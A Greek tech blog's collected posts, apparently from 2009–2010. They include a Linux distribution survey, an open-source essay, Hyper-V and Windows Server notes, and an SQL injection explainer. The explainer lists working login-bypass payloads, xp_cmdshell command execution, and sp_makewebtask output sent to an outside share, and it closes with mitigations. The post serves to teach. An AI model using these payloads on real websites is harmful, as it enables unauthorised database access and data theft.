Στην συνέχεια θα δούμε κάποιες διανομές οι οποίες προτείνονται σαν γενικής χρήσης, πράγμα που σημαίνει ότι εξαρτάται από τον χρήστη το πώς θα την διαμορφώσει. Αλλά σε γενικές γραμμές, ο χρήστης χρησιμοποιώντας κάποια από αυτές χωρίς περαιτέρω κινήσεις θα μπορεί να κάνει την δουλειά που θέλει.

Distribution

Base distribution

Latest release date

Alinex

Ubuntu

07/03/2008

Arch Linux

none

16/02/2009

Aurox

Fedora

31/08/2006

Chrome OS

?

N/A

CRUX

none

08/09/2009

Debian

none

14/02/2009

Fedora

Red Hat Linux

09/06/2009

Frugalware

Slackware

07/09/2009

Gentoo Linux

none

2008-07-06 [2]

Mandriva Linux

Red Hat Linux

09/10/2008

Pardus

Gentoo Linux

14/09/2008

Pie Box Enterprise Linux

Red Hat Enterprise Linux

15/08/2006

Red Flag Linux

Asianux

11/11/2005

Source Mage GNU/Linux

Sorcerer

11/02/2009

Ututo GNU/Linux

Gentoo Linux

15/03/2009

Easy Peasy

Ubuntu

20/04/2009

Στην λίστα αυτή υπάρχουν βασικές διανομές όπως το Debian και το Gentoo linux, αλλά και άλλες γνωστές όπως το Mandriva, το Fedora και το Arch Linux.

Πρόταση: Τα repositories του Debian, είναι πραγματικά πολλά και φυσικά μιλάμε για αντίστοιχα και για Ubuntu. Οπότε οι λύσεις σε αυτή την περίπτωση για εγκατάσταση προγραμμάτων είναι πραγματικά απεριόριστες. Όχι ότι στις άλλες διανομές δεν θα βρείτε αντίστοιχη ποικιλία λύσεων. Το Easy Peasy προτείνεται για netbooks/laptops.

Multimedia Distributions

Όπως καταλαβαίνετε, υπάρχουν και κάποιες διανομές, έτοιμες για τους λάτρεις των Multimedia. Όσοι θέλουν να έχουν ένα έτοιμο μηχάνημα για να δημιουργούν videos ή μουσική, πέραν του να ακούνε, σε αυτές τις διανομές θα τα βρουν όλα έτοιμα.

Distribution

Base distribution

Latest release date

64 Studio

Debian

09/06/2008

Ubuntu Studio

Debian

30/11/2008

XBMC Live

Ubuntu

14/11/2008

Musix GNU+Linux

Knoppix, Kanotix, Debian

05/03/2007

DeMuDi

Debian

03/11/2005

dyne:bolic

none

22/09/2007

Πρόταση: Όποια διανομή και να επιλέξετε, να ξέρετε ότι θα μείνετε ευχαριστημένοι, καθώς καλύπτει τις ανάγκες σας. Απλά θα πρέπει να μάθετε να χρησιμοποιείτε τα εν λόγω προγράμματα. Για παράδειγμα θα οι χρήστες του Fruity Loops θα δείτε στο LMMS ένα πολύ οικείο περιβάλλον.

Go To Part 2

Read more...
1 comment
550 views

Διανομές Linux (τα άπαντα) - Part 2

By Blackman, October 8, 2009

συνεχίζοντας την αναφορά μας...

<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

Portable Distributions

Μία άλλη κατηγορία και συνάμα εύκολη και βολική είναι οι φορητές διανομές. Οι συγκεκριμένες ξεχωρίζουν για το μικρό μέγεθός τους.

Distribution

Base distribution

Latest release date

Damn Small Linux

Knoppix

22/04/2008

OpenWRT

?

2009-?-? [3]

Puppy Linux

none

2008-11-03 [4]

SliTaz GNU/Linux

none

16/04/2009

Πρόταση: Με μέγεθος 50mb είναι πολύ όμορφο να κρατάς μαζί σου ένα ολόκληρο λειτουργικό με μία αρκετά μεγάλη γκάμα. Τουλάχιστον τόσο είναι το Damn Small Linux. Όχι ότι τα άλλα είναι πολύ μεγαλύτερα.

Business Workstation/Server Distributions

Φυσικά μπορεί λίγοι να είναι αυτοί που χρησιμοποιούν Linux στο εργασιακό περιβάλλον, αλλά αυτό δεν σημαίνει ότι δεν υπάρχουν συστήματα για τέτοια δουλειά.

Distribution

Base distribution

Latest release date

SUSE Linux

Slackware, Jurix[6]

21/05/2008

Red Hat Enterprise Linux

Fedora

21/05/2008

Rocks

Red Hat Linux

2008-11-? Rocks 5.1 (V.1)

CentOS

RHEL

23/06/2008

Red Hat Linux

none

31/03/2003

Asianux

RHEL

22/09/2007

Στην λίστα υπάρχει το Suse που το υποστηρίζει η Novel, αλλά και το Red Hat. Τουλάχιστον αυτά τα δύο θεωρούνται από τα πιο δυνατά και αξιόπιστα στον χώρο, καθώς είναι και από τα ελάχιστα που δεν διατίθενται σαν free distributions, αλλά υπάρχει η δυνατότητα αγοράς και συνάμα υποστήριξης από την εκάστοτε εταιρεία. Φυσικά τα παραπάνω πολύ εύκολα μπορούν να έχουν και ρόλους server σε μία επιχείρηση και συνήθως όσες εταιρείες χρησιμοποιούν κάποιο linux σύστημα σαν server έχουν κατά μεγάλο ποσοστό μία από τις παραπάνω λύσεις. Η απλή (open) έκδοση του Red Hat και το CentOS είναι αρκετά δυνατές διανομές.

Πρόταση: Το Rocks προσωπικά δεν το έχω δει, αλλά η λύση των SUSE και Red Hat, ακόμα και στις open distributions είναι πολύ καλές. Προσωπικά λατρεύω το περιβάλλον του Open SUSE.

Server Distributions

Πέραν των προαναφερθέντων διανομών, υπάρχουν και κάποιες συγκεκριμένες διανομές που είναι έτοιμες για ρόλο server σε ένα δίκτυο.

Distribution

Base distribution

Latest release date

Annvix

Mandrake Linux

EnGarde Secure Linux

none

2008-04-?

Nitix

none

18/10/2006

Open Enterprise Server on Linux

SUSE Linux Enterprise Server

24/03/2009

Oracle Enterprise Linux

RHEL

09/09/2009

Trustix Secure Linux

Red Hat Linux

06/03/2007

Finnix

Debian

29/01/2008

Σε αυτή την λίστα ξεχωρίζει η Oracle Enterprise Server on Linux σαν λύση, τουλάχιστον για όσους δουλεύουν με Oracle. Ενώ μπορεί κάποιος να παρατηρήσει ότι δύο δυνατά συστήματα όπως το Trustix Secure Linux και το Open Enterprise Server on Linux είναι βασισμένα σε SUSE και Red Hat αντίστοιχα.

Πρόταση: Η λύση του Trustix Secure Linux σε ένα εταιρικό δίκτυο δεν είναι κακή ιδέα και για όσους ασχολούνται αποκλειστικά με Microsoft συστήματα. Ενώ το Finnix χαρακτηρίζεται από την δυνατότητες του στο administration κομμάτι.

Desktop & Workstation & Server Distributions

Δεν είναι γενικής χρήσης, αλλά μπορούν να δουλέψουν είτε σε προσωπικό υπολογιστή, είτε σε εργασιακό περιβάλλον είτε ως server. Οι υπηρεσίες και εφαρμογές που θα βρείτε εγκατεστημένες καλύπτουν όλο αυτό το φάσμα.

Distribution

Base distribution

Latest release date

ALT Linux

none

20/02/2009

Lunar Linux

Sorcerer

17/02/2007

Rxart

Debian

16/04/2006

Slackware

SLS

26/08/2009

Yoper

none

03/10/2007

Σε αυτή την λίστα ξεχωρίζει το Slackware κατά την προσωπική μου άποψη, καθότι μία διανομή πάνω στην οποία είναι βασισμένο και το γνωστό BackTrack.

Πρόταση: Προσωπικά, δεν έχω γνώμη για τις υπόλοιπες διανομές τόσο, όσο έχω για το Slackware. Οπότε δεν είναι κακό να το δοκιμάσετε, έστω και σαν Virtual Machine.

Desktop & Server Distributions

Διαφοροποιούμε λίγο την παραπάνω κατηγορία, αφαιρώντας τον χαρακτηρισμό του Workstation σε αυτές τις διανομές, καθότι δεν θα βρείτε κάποια από τα προγράμματα που θα βρείτε στις παραπάνω λύσεις.

Distribution

Base distribution

Latest release date

Caixa Mágica

Mandriva Linux

03/06/2009

openSUSE

SUSE Linux

18/12/2008

QiLinux

none

01/08/2006

Ubuntu

Debian

23/04/2009

Zenwalk Linux

Slackware

07/03/2009

Είναι διανομές που μπορούν από απλά desktops να γίνουν δυνατοί servers, το ότι το πασίγνωστο Ubuntu βρίσκετε σε αυτή την λίστα, αλλά επίσης και το OpenSUSE λέει πολλά. Οι χρήστες των παραπάνω λειτουργικών τα βρίσκουν σχεδόν όλα τα απαραίτητα μόλις ανοίξουν το σύστημα τους για πρώτη φορά. Η μετατροπή από ένα απλό desktop λειτουργικό σε server, γίνεται απλά με την εγκατάσταση συγκεκριμένων στοιχείων από τα σχετικά repositories. Κάποιοι πιστεύουν ότι πχ το Ubuntu είναι άψογο για το σπίτι, μπορεί να δουλέψει πολύ καλά σαν server, αλλά δεν προτείνεται τόσο για office use.

Πρόταση: Όταν σε μία τέτοια λίστα υπάρχει το Ubuntu δεν μπορεί να προταθεί κάτι άλλο. Όσο και να μου αρέσει το OpenSUSE, το λειτουργικό που βοήθησε στην μεγάλη διάδοση των Open Source τα τελευταία χρόνια και πλέον χρησιμοποιείται από το μεγαλύτερο ποσοστό των χρηστών Linux παγκοσμίως είναι το Ubuntu. Προφανώς το έχουν φέρει πολύ κοντά στα Windows σε θέμα χρηστικότητας, αλλά και επίσης σπάνια δεν θα βρείτε driver για Ubuntu ή κάποια αντίστοιχη λύση σε οποιοδήποτε application

Live CD Distributions

Ένα από τα ατού που έχουν οι περισσότερες διανομές του linux, είναι ότι είναι διαθέσιμες ως Live CD. Δηλαδή, βάζει το CD και κάνει boot από αυτό, με αποτέλεσμα έστω και με λίγη καθυστέρηση να έχεις ένα πλήρες λειτουργικό σύστημα, σε οποιοδήποτε υπολογιστή, χωρίς να χρειαστεί να κάνεις εγκατάσταση.

Distribution

Base distribution

Latest release date

Gnoppix

Knoppix

07/09/2005

Knoppix

Debian

27/03/2008

SLAX

Slackware

18/04/2008

Kanotix

Debian, Knoppix

31/12/2007

SMS - Slack Mini Server

Slackware

05/07/2009

Kurumin Linux

Knoppix

21/02/2007

Στην λίστα αυτή βρίσκεται η παρέα των Gnoppix, Knoppix, Kanotix που όπως και στην κατάσταση του Ubuntu, θα τα βρείτε με διαφορετικό γραφικό περιβάλλον. Ενώ μου άρεσε και το SLAX την πρώτη φορά που το χρησιμοποίησα, έχοντας μεγάλη ποικιλία από διαθέσιμα εργαλεία.

Πρόταση: Θα παρατηρήσετε ότι τα μισά είναι βασισμένα στο Knoppix και τα άλλα στο Slackware. Οπότε η λύση Knoppix για live CD μπορεί να θεωρηθεί σαν εύκολη, πολλοί δουλεύουν με το Gnoppix επίσης. Πάντως για ρίξτε μία ματιά στο SMS. Δεν ξέρω αν θα πείραζε κανέναν admin να έχει ένα bootable server σε ένα CDάκι. Προσωπικά, θα το μελετήσω σύντομα.

Security Distributions

Όσοι με ξέρετε, θα γνωρίζετε κιόλας ότι αυτό το κομμάτι ίσως να είναι το πιο αγαπημένο μου. Ο λόγος;

Distribution

Base distribution

Latest release date

BackTrack

Slackware(version < 3.x)/Ubuntu(version > 4.x)

19/06/2009

Arudius

none

06/02/2006

Φυσικά για την ύπαρξη του BackTrack σε αυτή την κατηγορία. Τα λόγια είναι περιττά και αν δεν έχετε διαβάσει τα σχετικά blog post μου για αυτό, καιρός να το κάνετε.

http://autoexec.gr/blogs/blackman/archive/2008/11/28/back-to-back-following-your-track-i-m-using-linux-backtrack.aspx

http://autoexec.gr/blogs/blackman/archive/2009/07/07/back-to-the-track-4.aspx

Πρόταση: Ένα MUST εργαλείο για να το έχετε. Η έκδοση 3 είναι διαθέσιμη και για USB, ενώ η τελευταία έκδοση είναι σε live CD. Φυσικά μιλάω για το BackTrack.

Go To Part 3

Read more...
1 comment
520 views

Απλή παρατήρηση… Open και Close Source πάνε μαζί; Από πια οπτική γωνία όμως;

By Blackman, July 15, 2010

Με αφορμή ένα άρθρο που διάβασα για τον Jean-Philippe Courtois που είναι ο πρόεδρος της Microsoft International και ένα λόγο που έδωσε με θέμα ‘A Perspective of Openness’, συνειδητοποίησα κάποια πράγματα.
Στο λόγο του ανέφερε σε γενικές γραμμές το πόσο εύκολα μπορούν να συμβιώσουν οι έννοιες open source και close source με την όλη ιδεολογία του Openness που γενικότερα χρησιμοποιεί η Microsoft ειδικότερα τώρα με το cloud computing. Βασικά αν έχετε παρακολουθήσει αυτό το Blog, θα παρατηρήσατε ότι αρκετός από τον κώδικα που έχει δώσει προς τα έξω η Microsoft έχει κατά κύριο αποδέκτη συστήματα και εφαρμογές που μπορούν να χρησιμοποιηθούν σε cloud computing (οποιοδήποτε σύστημα) με κύριο στόχο το δικό της Windows Azure.
Έτσι έρχεται να παρουσιάσουν την γενικότερη ιδέα, ότι δίνονταν open source σε ένα κατά τα άλλα close source σύστημα επιτυγχάνονται πολλά προς καλό όλων. Όμως η όλη αυτή ιδέα με έβαλε σε σκέψη. Ακούστε πια είναι η ειρωνεία σε αυτό. Ο κόσμος του Linux στηρίζεται κυρίως στο Open Source και με αυτό τον τρόπο επιζεί (το Open Source) και αναπτύσσεται όλο και περισσότερο. Γιατί πολύ απλά μπορεί να πάρει το κώδικα ο οποιοσδήποτε και να τον φέρει στα μέτρα του και μετά να δώσει αυτό πιο έξω για να βελτιωθεί ακόμα περισσότερο.
Φαντάζομαι όλοι γνωρίζεται πως λειτουργεί αυτό το πράγμα. Όμως σκεφτόμενος όλα αυτά έκανα και μία ανακάλυψη μέσω της δικής μου προσωπικής εμπειρίας. Στον κόσμο του Open Source αυτοί που κυρίως δημιουργούν πράγματα είναι άτομα με γνώσεις προγραμματισμού, δηλαδή developers. Έχω επαφή κατά καιρούς με τέτοιους ανθρώπου που ασχολούνται με ανοιχτό κώδικα ώστε να δημιουργούν όμορφα πράγματα.
Σε αυτό το σημείο έρχεται και η παρατήρηση μου. Από την προσωπική μου εμπειρία συνειδητοποίησα ότι μεγάλο μέρος των ατόμων που δημιουργούν εφαρμογές με χρήση open source εργαλείων ή χρησιμοποιώντας ανοιχτό κώδικα για να δημιουργήσουν ή να βελτιώσουν κάτι νέο, αυτοί οι άνθρωποι σε μεγάλο ποσοστό όπως ανέφερα δεν έχουν καμία διάθεση να δώσουν τον δικό τους κώδικα προς τα έξω. Σε συζήτηση που είχα με φίλο που ασχολείται με open source οι ατάκες που άκουγα όταν συζητούσαμε για ευκαιρίες δημιουργίας ‘όμορφων’ εφαρμογών ήταν τύπου ‘πολύ καλή ιδέα, μπορούμε άνετα να το πουλήσουμε μετά σαν υπηρεσία’. Φυσικά το θέμα δεν είναι αυτό, ούτε απαγορευτικό είναι, αλλά σε αναφορά μου αν θα έχει σκοπό μετά την ολοκλήρωση να διαθέσει τον επιπλέον κώδικα που δημιούργησε ήταν να ακούσω ‘φυσικά όχι, όποιος έχει αντίστοιχη ιδέα να την υλοποιήσει μόνος του όπως θα κάνω και εγώ’. Αυτό ήταν μία πρόσφατη συζήτηση και δεν είναι η μόνη με developers σε τέτοια επίπεδα.
Φυσικά η εικόνα είναι απλή. Κανένας developer δεν έχει την διάθεση να δώσει έξω κώδικα που εκείνος έφαγε τις άπειρες ώρες για να υλοποιήσει, ειδικότερα αν γνωρίζει ότι όποιος άλλος μπορεί να τον χρησιμοποιήσει για δικό του κέρδος. Ένα πράγμα σαν τα πνευματικά δικαιώματα δηλαδή. Οπότε βλέποντας τα τελευταία χρόνια την Microsoft να δίνει όλο και περισσότερο κώδικα στον κόσμο των developers και ένα ολόκληρο κόσμο (Open Source) στημένο σε αυτή την αντίληψη χρόνια τώρα, παρατηρώ ότι οι αποδέκτες αυτού του ‘δώρου’ έχουν άλλο τρόπο σκέψης. Φυσικά δεν αναφέρομαι για όλους, αλλά για αυτούς που είναι ιδεολόγοι και ακόλουθοι του Open Source χρόνια τώρα. Τελικά μήπως αυτό που έκανε η Microsoft είναι τρομερό βήμα μπροστά; Μήπως οι αποδέκτες του ανοιχτού κώδικα απλά το βλέπουν καθαρά business με όσο γίνεται περισσότερο πιο καθαρό κέρδος για αυτούς; Τελικά η ιδέα ότι ανοιχτός και κλειστός κώδικας είναι μέρος ενός συστήματος είναι κάτι που ίσως να παραφράζεται από τους αποδέκτες; Είναι σωστή ή λάθος αυτός ο τρόπος σκέψης; Μήπως εγώ τα έχω μπερδέψει; Φαντάζομαι ότι έτσι ανοίγω μεγάλη συζήτηση, αλλά θα με ενδιέφερε πολύ να ακούσω τις ιδέες και τις αντιλήψεις σας πάνω στο θέμα. Απλά να επισημάνω και πάλι ότι η παρατήρηση έχει να κάνει με τους ιδεολόγους τους open source και του ‘μοιράζω για να κάνω τον κόσμο (της πληροφορικής) καλύτερο’, αλλά τελικά οι ίδιοι προσβλέπουν σε κάποιο οικονομικό όφελος.
Και κάποια ενδιαφέροντα Links
http://www.dwheeler.com/oss_fs_why.html
http://port25.technet.com/archive/2010/07/06/a-perspective-on-openness.aspx
http://www.ehow.com/how_5203278_make-money-open-source.html
http://www.cmswire.com/cms/enterprise-cms/how-to-make-money-with-open-source-software-007097.php

Read more...
3 comments
1006 views

Linux Integration Services RC for Hyper-V

By Blackman, May 6, 2010

Ανακοινώθηκε η RC έκδοση των Linux Integration Services για το Hyper-V. (Ακούς Βαγγέλη) Τα καλούδια που προσέφεραν αυτά τα services μέχρι την beta έκδοση, ήταν τα εξής:
Driver support for synthetic devices: The Linux Integration Services support the synthetic network controller and the synthetic storage controller that were developed specifically for Hyper-V.
Fastpath Boot Support for Hyper-V: Boot devices now take advantage of the block Virtualization Service Client (VSC) to provide enhanced performance.
Timesync: The clock inside the virtual machine will now remain synchronized with the clock on the host.
Integrated Shutdown: Virtual machines running Linux can now be shut down from either the Hyper-V Manager or the VMConnect application using the “Shut Down” command.
Symmetric Multi-Processing (SMP) Support: Supported Linux distributions can now properly use up to 4 virtual processors (VP) per virtual machine.
Στην νέα RC έκδοση προστέθηκαν και τα παρακάτω πολύ χρήσιμα
Heartbeat: Allows the host to detect whether the guest is running and responsive.
Pluggable Time Source: A pluggable clock source module is included to provide a more accurate time source to the guest.
Οπότε πλέον το σύστημα γνωρίζει τι κάνει το linux host, ενώ διάφορα θεματάκια που μπορεί να δημιουργηθούν σε ένα σύστημα με σχέση το ρολόι του, πλέον εξαλείφεται και αυτό.
Αν θέλετε να τα κατεβάσετε...be my guest (όσοι μπορούν να μπουν στο connect)
https://connect.microsoft.com/site495/Downloads
και μην ξεχάσουμε ότι επίσημα υποστηρίζονται τα παρακάτω λειτουργικά:
Novell SUSE Linux Enterprise Server 10 SP3, SUSE Linux Enterprise Server 11, και Red Hat Enterprise Linux 5.2 / 5.3 / 5.4 / 5.5.
Ανεπίσημα, κάντε τις δοκιμές σας...αν και οι περισσότεροι έχουμε δοκιμάσει επιτυχώς CentOS . Για ότι άλλο θα πρέπει να βάλετε τις φόρμες εργασίας για να μπείτε στις 'αγωνιστικές' δοκιμές των όποιων άλλων διανομών μπορεί να παίξουν σε Hyper-V.
Σύντομα στην RTM...

Read more...
1 comment
750 views

Windows Server 2008 R2 Feature Components Poster

By Blackman, May 20, 2010

Μετά από τα όμορφα Posters που μας έδωσε ο αγαπητός Αντώνης Χατζηπαυλής, συνεχίζω την όμορφη παράδοση που λέει ότι πρέπει να εκτυπώσετε και αυτό που θα σας δώσω εγώ για να έχετε στο γραφείο σας.
Το συγκεκριμένο είναι ενδεικτικό για το τι μπορεί να κάνει κάποιον με έναν Windows Server 2008 R2 και απλά τα λόγια είναι περιττά.
Enjoy...
Windows Server 2008 R2 Feature Components Poster

Read more...
1 comment
778 views

SQL Injection – hacking websites και όχι μόνο

By Blackman, March 5, 2010

Ξεκινάω το συγκεκριμένο post για να δείτε πως γίνεται το hack που ονομάζεται SQL Injection, καθώς επίσης και διάφοροι τρόποι που προτείνονται για να αποφευχθεί κάτι τέτοιο και διάφορα άλλα. Σκοπός μου είναι να δώσω την εικόνα του συγκεκριμένου hack, αλλά αν θέλετε να μάθετε να το κάνετε θα πρέπει να το ψάξετε περισσότερο μόνοι σας.

Τι είναι SQL Injection attack

Όπως μπορείτε να βρείτε και στο Wikipedia, μιλάμε για μία τεχνική η οποία εκθέτει αδυναμίες στην ασφάλεια (security vulnerability exploit) μίας βάσης δεδομένων. Η συγκεκριμένη ‘τρύπα’ έχει να κάνει με το τρόπο που φιλτράρονται οι χρήστες ή γιατί τα usernames δεν είναι strongly typed. Οι επιθέσεις αυτές είναι επίσης γνωστές και ως SQL Insertion attacks.

Μόλις ο hacker αποκτήσει πρόσβαση, τότε μπορεί να εκτελέσει ότι query θέλει πάνω στην βάση δεδομένων. Συνεπώς και να τραβήξει ή να αλλάξει όποια πληροφορία θέλει.

SQL Injection FAQ

Ε:Τι χρειάζεται κάποιος για να κάνει την παραπάνω επίθεση;

Α:Απλά έναν web browser.

Ε:Τι πρέπει να ψάξει για να κάνει κάποιος τη συγκεκριμένη επίθεση;

Α:Σελίδες που επιτρέπουν την εισαγωγή δεδομένων όπως login page, search page, feedback κλπ. Μερικές φορές ακόμα και HTML σελίδες χρησιμοποιούν POST εντολές για να στείλουν τις σχετικές παραμέτρους σε κάποια σελίδα ASP. Οπότε σε αυτή την περίπτωση δεν θα δείτε τις παραμέτρους αυτές στην URL, αλλά μόνο αν ελέγξετε τον source code και ψάξετε και βρείτε το σημείο “FORM” μέσα στον κώδικα πχ

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Οτιδήποτε υπάρχει μεταξύ FORM & /FORM είναι πιθανές παράμετροι που θα μπορεί κάποιος να χρησιμοποιήσει.

Ε:Τι γίνεται αν δεν βρίσκουμε σελίδα που να δέχεται εισαγωγή δεδομένων;

A:Θα πρέπει να ψάξετε σελίδα ASP, JSP, CGI ή PHP. Αυτό που θα πρέπει να ψάχνει κάποιος είναι σελίδες όπως:

http://autoexec.gr/index.asp?id=10

E:Πως θα δοκιμάσουμε αν υπάρχει ‘τρύπα’

A:Δοκιμάστε να γράψετε hi' or 1=1--

αυτό μπορεί να είναι στο Login, στο Password ή ακόμα και την URL

πχ http://autoexec.gr/index.asp?id=hi' or 1=1--

E:Αλλά γιατί ' or 1=1--;

Α:Πέραν του ότι μπορεί να γίνει bypass το login, είναι πιθανόν να δει κάποιος επιπλέον πληροφορίες που συνήθως δεν είναι διαθέσιμες. Αν πχ παμε σε μία σελίδα που έχει link σε μία άλλη σελίδα όπως http://autoexec.gr/index.asp?category=hardware

Βλέπουμε ότι στο URL η μεταβλητή είναι το category, ενώ το hardware είναι η τιμή για την μεταβλητή. Αυτό που πλευρά κώδικα θα εμπεριέχει κώδικα σαν και τον παρακάτω:

v_cat = request(“category")

sqlstr=”SELECT * FROM hardwr WHERE PCategory=’” & v_cat & “’”

set rs=conn.execute(sqlstr)

Έτσι με το παραπάνω το SQL που ουσιαστικά αντιστοιχεί τον συγκεκριμένο κώδικα μπορεί να γίνει:

SELECT * FROM hardwr WHERE PCategory=’hardware’

όπου το query θα φέρει πίσω αποτελέσματα για το hardware.

Οπότε σε αυτή την περίπτωση αν πάρουμε το url

http://autoexec.gr/index.asp?category=hardware' or 1=1--

Τώρα η μεταβλητή v_cat αντιστοιχεί στο "hardware' or 1=1--", οπότε αν το βάλουμε αυτό σε SQL query, θα έχουμε

SELECT * FROM hardwr WHERE Pcategory=’hardware’ or 1=1--‘

Τι έχουμε σε αυτή την περίπτωση; Ότι το query θα μας φέρει τα πάντα από τον πίνακα hardwr ασχέτως αν είναι ίσο με το hardware ή όχι. Η διπλή παύλα (--) λέει στον MS SQL server να αγνοήσει το υπόλοιπο query, το οποίο με την σειρά του θα παρατήσει το τελευταίο quote (‘). Μερικές φορές η διπλή παύλα μπορεί να αντικατασταθεί με το σύμβολο της δίεσης (#).

Παρόλα αυτά όμως, αν δεν είναι SQL server ή δεν μπορείς (ή δεν θες) να αγνοήσεις το υπόλοιπο query, μπορούμε επίσης να δοκιμάσουμε να βάλουμε

‘ or 'a'='a

Οπότε το SQL query θα γίνει:

SELECT * FROM hardwr WHERE PCategory=’hardware’ or ‘a’=’a’

Και θα έχουμε το ίδιο αποτέλεσμα.

Αντίστοιχα μπορείτε να δοκιμάσετε

‘ or 1=1--

“ or 1=1--

or 1=1--

‘ or ‘a’=’a

“ or “a”=”a

‘) or (‘a"=‘a

E:Μπορώ να αποκτήσω δυνατότητα απομακρυσμένη εκτέλεσης με SQL Injection;

Α:Οι χρήστες SQL και δη οι developers, γνωρίζουν ότι ο SQL είναι ένα πολύ δυνατό εργαλείο και αυτό γιατί τους δίνει την δυνατότητα να κάνουν ΤΑ ΠΑΝΤΑ σε ένα σύστημα. Έτσι, επειδή ο SQL Server τρέχει σαν SYSTEM, αυτό σημαίνει ότι τα δικαιώματα που έχει είναι επιπέδου administrator στο σύστημα. Οπότε εύκολα από την στιγμή που μπορούμε να τρέξουμε ότι θέλουμε, με την χρήση stored procedures (που είσαι Αντώνη

'; exec master..xp_cdmshel ‘ping 10.10.1.2'--

Σε περίπτωση που το μονό quote δεν δουλεύει, χρησιμοποιήστε διπλό.

Το ερωτηματικό στην αρχή (η semi colon όπως το λένε στα ξένα) θα τερματίσει το SQL query που εκτελείται εκείνη την ώρα και θα μας επιτρέψει να ξεκινήσουμε μία νέα εντολή SQL. Για την επιβεβαίωση ότι η εντολή εκτελέστηκε σωστά μπορούμε να πάρουμε απάντηση από ping στην IP για να δούμε αν υπάρχει κάποιο πακέτο από τον server:

#tcpdump icmp

Αν δεν πάρουμε απάντηση από το Ping (που λέγετε Pong), και έχουμε μήνυμα λάθους που σχετίζεται με δικαιώματα, τότε πιθανόν ο administrator έχει περιορίσει την εκτέλεση των stored procedures στον Web User.

E:Πως μπορώ να πάρω το αποτέλεσμα του query μου;

Α:Με την χρήση του sp_makewebtask:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMAS.TABLES"

αλλά να έχετε υπόψη ότι ο φάκελος SHARE που θα βρίσκεται στην IP που θέλουμε πρέπει να έχει sharing pemissions σε Everyone.

Φυσικά υπάρχουν απαντήσεις και σε άλλα ερωτήματα όπως να πάρουμε αποτελέσματα από μία βάση με την χρήση μηνυμάτων λάθους από ODBC ή πως να τραβήξουμε όλα τα ονόματα στηλών από ένα πίνακα, ή πως τραβάμε ότι data θέλουμε, πως να βάλουμε δικά μας data κλπ

Οπότε καταλαβαίνετε ότι η όλη διαδικασία είναι μεγάλη και φυσικά άμεσα συνδεδεμένη με αυτό που κάνει και ένας developer. Αν για κάποιους δεν σας λένε τίποτα, σίγουρα για άτομα όπως ο Αντώνης του λένε πολλά.

Αν θέλετε να μάθετε περισσότερα για SQL Injection δείτε τα παρακάτω…

http://projects.webappsec.org/SQL-Injection

http://msdn.microsoft.com/en-us/library/ms161953.aspx

http://net.tutsplus.com/articles/can-you-hack-your-own-site-a-look-at-some-essential-security-considerations/

http://en.wikipedia.org/wiki/SQL_injection

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#LineCommentAttacks

http://geniushackers.com/blog/2009/04/08/sql-injection-ultimate-method-for-website-hacking/

ΠΩΣ ΑΠΟΦΕΥΓΟΥΜΕ SQL INJECTIONS.

Αν διαβάσετε τα παραπάνω θα πάρετε και μία εικόνα για το πρέπει να κάνετε ώστε να αποφύγετε τι ‘κακοτοπιές’ και συνεπώς να μην πέσετε θύμα μίας επίθεσης με SQL Injection. Αλλά θα αναφέρω και κάποια πράγματα και εγώ.

Φροντίστε να ‘βγάλετε’ (εσείς ή κάποιος developer) εκτός χαρακτήρες όπως quotes, slash, backslash, semi colon, NULL, new line, κλπ και αυτά πρέπει να βγουν από τα εξής:

1) εισαγωγή από χρήστες σε πεδίο

2) παραμέτρους στην URL

3) Τιμές από cookies

Επίσης κάτι άλλο που προτείνεται είναι το να βεβαιωθείτε ότι όλα τα νούμερα έχουν μετατραπεί σε integer. Επίσης διαγράψτε stored procedures που δεν σας αρέσουν και δεν χρειάζεστε όπως master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask .

ΓΕΝΙΚΑ ΣΥΜΠΕΡΑΣΜΑΤΑ

Η χρήση SQL Injection καταλαβαίνετε ότι δεν είναι κάτι απλό. Είναι πιθανότατα ένα από τους πιο δυνατούς τρόπους για να κάνει κάποιος hacking και επίσης είναι ο πιο απλός καθώς δεν χρειάζεται ιδιαίτερα εργαλεία, αλλά μονάχα ένας web browser. Από εκεί και πέρα αν κάποιος έχει τις απαραίτητες γνώσεις μπορεί να αποκτήσει πλήρης πρόσβαση στο μηχάνημα, πέραν από τα δεδομένα που μπορεί να έχει η βάση δεδομένων. Αυτό που καταφέρνει να κάνει κάποιος ουσιαστικά είναι να ‘κοροϊδέψει το σύστημα και να του δώσει όλες τις πληροφορίες που ζητάει, και καταλαβαίνετε εύκολα ότι αν το συγκεκριμένο attack συνδυαστεί με Google Hacking η ζωή του επίδοξου hacker γίνεται ακόμα πιο εύκολη.

Ελπίζω με το παραπάνω να πήρατε μία εικόνα για το τι είναι αυτή η μορφή επίθεσης, οπότε να πάρετε και τα μέτρα σας (όσοι χρειάζεται).

Επιπλέον Links

http://www.digitaloffense.net/wargames01/IOWargames.ppt
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=6
http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

http://www.owasp.org/asac/input_validation/sql.shtml

http://www.sensepost.com/misc/SQLinsertion.htm

Read more...
7 comments
1984 views

Η Microsoft Platinum Sponsor στο ετήσιο Open Source Business Conference 2010

By Blackman, February 18, 2010

H Microsoft θα είναι για ακόμα μία φορά πλατινένιος χορηγός του ετήσιου συνεδρίου για Open Source το οποίο ξεκίνησε εχθές και ολοκληρώνεται σήμερα στο Palace Hotel στο San Francisco.
Σαν μέρος της χορηγίας θα μιλήσει σήμερα (18/2) ο Stuart McKee, National Technology Office των ΗΠΑ για την Microsoft. Με τίτλο “Open Source at Microsoft: Meeting cusomer, developer and partner needs through a diversified ecosystem.” ο McKee θα μιλήσει για όλες τις ευκαιρίες που υπάρχουν για τις εφαρμογές ανοιχτού κώδικα μέσα σε όλες τις πλατφόρμες της Microsoft, το SharePoint και το Azure και το πόσο καλό είναι για όσους εμπλέκονται στην όλη κατάσταση, μέσω της αυξημένη ευελιξίας και του πλήθους των επιλογών που δίνονται.
Λεπτομέρειες στην επίσημη ιστοσελίδα
Επιπλέον links.
